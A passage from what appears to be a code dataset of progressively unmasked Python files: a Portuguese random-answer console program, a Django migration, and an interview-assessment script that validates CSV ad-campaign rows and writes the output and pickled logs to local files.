"step-4": "from random import randint\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\nresposta = ['Sim', 'Não', 'Talvez', 'Por que não?', 'Vá', 'Não sei',\n 'Pode ser', 'Talvez sim', 'Talvez não', 'Tenha Fé']\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
"step-5": "from random import randint\n\n#funções\ndef leialetra():\n '''\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n '''\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n else:\n if msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ','')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n#programa principal\nresposta = [\"Sim\", \"Não\", \"Talvez\", \"Por que não?\", \"Vá\", \"Não sei\", \"Pode ser\", \"Talvez sim\", \"Talvez não\", \"Tenha Fé\"]\n\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# Generated by Django 2.0.3 on 2018-04-30 16:25
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('threads', '0007_auto_20180430_1617'),
]
operations = [
migrations.AlterField(
model_name='thread',
name='last_activity',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
normal
|
{
"blob_id": "6cd250b3bffd87657ec7cc28eaffe817c6d9f73f",
"index": 9794,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('threads', '0007_auto_20180430_1617')]\n operations = [migrations.AlterField(model_name='thread', name=\n 'last_activity', field=models.DateTimeField(default=django.utils.\n timezone.now))]\n",
"step-4": "from django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n dependencies = [('threads', '0007_auto_20180430_1617')]\n operations = [migrations.AlterField(model_name='thread', name=\n 'last_activity', field=models.DateTimeField(default=django.utils.\n timezone.now))]\n",
"step-5": "# Generated by Django 2.0.3 on 2018-04-30 16:25\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('threads', '0007_auto_20180430_1617'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='thread',\n name='last_activity',\n field=models.DateTimeField(default=django.utils.timezone.now),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
<|reserved_special_token_0|>
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
finalOutput = (
'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'
+ '\n')
errorFinalOutput = ''
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()
) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,
'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}
inputDirectory = 'inputFiles'
currentLines = 0
for file in os.listdir(inputDirectory):
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
for file in os.listdir(inputDirectory):
usableRows = 0
errorRows = 0
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent, row, finalOutput
)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
f.close()
newDataSource = DataSource(file, usableRows, errorRows, indices)
dataSources.append(newDataSource)
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
print(errorFinalOutput)
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
print(
'Thanks for taking the time to look at my code and consider me for this position. Cheers!'
)
<|reserved_special_token_1|>
import csv, os, sys, pickle
from datetime import date
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
finalOutput = (
'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'
+ '\n')
errorFinalOutput = ''
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()
) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,
'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}
inputDirectory = 'inputFiles'
currentLines = 0
for file in os.listdir(inputDirectory):
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
for file in os.listdir(inputDirectory):
usableRows = 0
errorRows = 0
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent, row, finalOutput
)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
f.close()
newDataSource = DataSource(file, usableRows, errorRows, indices)
dataSources.append(newDataSource)
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
print(errorFinalOutput)
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
print(
'Thanks for taking the time to look at my code and consider me for this position. Cheers!'
)
<|reserved_special_token_1|>
#Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
#Class For storing information about each file generally. Helpful for future
#use cases to remember the indicies from a file, if file has thousands of fields
#Also can be used as a log to store daily number of 'good' vs 'bad' rows
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
# getHeaderIndexes(indices, headers)
# Requires: Pre-populated indices dictionary, the header's row from a CSV file with
# naming convention conforming to the schema output from the directions
# Effects: Determines if file has the necessary colums to match the desired output
# schema
# Modifies: The indices variable, returning the correct indices within the csv row
def getHeaderIndexes(indices, headers):
counter = -1
a,b,c,d,e,f,g = False, False, False, False,False,False,False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if a == True and b == True and c == True and d == True and e == True and f == True and g == True:
valid = True
else:
valid = False
return indices, valid
# isRowValid(indices,row)
# Requires: a valid CSV file with columns necessary to match the expected output
# Effects: Determines if a single row should be added to the final output, or if
# the row is missing data / has incorrect data types for the field and thus
# will not be added to the output but instead printed out
# Modifies: N/A
def isRowValid(indices, row):
#String Non-Nullables
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':
pass
else:
return False
#Float Non Nullables
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
#String Nullables
sNs = ['Phone Number']
#No Check Required, because it can be nullable or a string. I do assume that
#it is required to have a "Phone Number" column, which is checked for in getHeaderIndexes
return True
# addUsableRow(indices, row, finalOutput)
# Requires: The row is known to follow the output schema as specificed in the requirements
# Effects: Adds row variables in the order specified in the output schema
# Modifies: the final output variable
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = '"'+ pn + '","' + cid + '","' + cpac + '","' + rl + '","' + phn + '","' + ad + '","' + zc + '"' + '\n'
finalOutput += temp
return finalOutput
# addErrorRow(indices, row, errorFinalOutput)
# Requires: The row does not follow the output schema
# Effects: adds the row to the error output variable that will be printed out
# Modifies: the error final output string which gets printed at the end of the daily
# job / procedure / script/ whatever The Zebra prefers to call these python data projects
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
#Variables and data structures
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {
"Provider Name": 0,
"CampaignID": 0,
"Cost Per Ad Click": 0,
"Redirect Link": 0,
"Phone Number": 0,
"Address": 0,
"Zipcode": 0
}
#InputFiles in list form
# inputList = [
# 'inputFilesTest/Auto.csv',
# 'inputFilesTest/Home.csv'
# ]
# InputFiles in a directory
inputDirectory = 'inputFiles'
#check if files are too large, or non-csv files
currentLines = 0
for file in os.listdir(inputDirectory):
# for file in inputList:
# currentLines += sum(1 for line in open(file))
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
#Main Algorithm loop through all files in the list
for file in os.listdir(inputDirectory):
# for file in inputList:
#usableRows and errorRows used for storing information from each data source
usableRows = 0
errorRows = 0
# with open(file, newline='') as f:
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
f.close()
#Add dataSource Information for possible future needs and logging purposes
newDataSource = DataSource(file,usableRows, errorRows, indices)
dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickel file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
flexible
|
{
"blob_id": "38c1b82a29a5ad0b4581e63fb083ca2487a79817",
"index": 9544,
"step-1": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\n<mask token>\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith 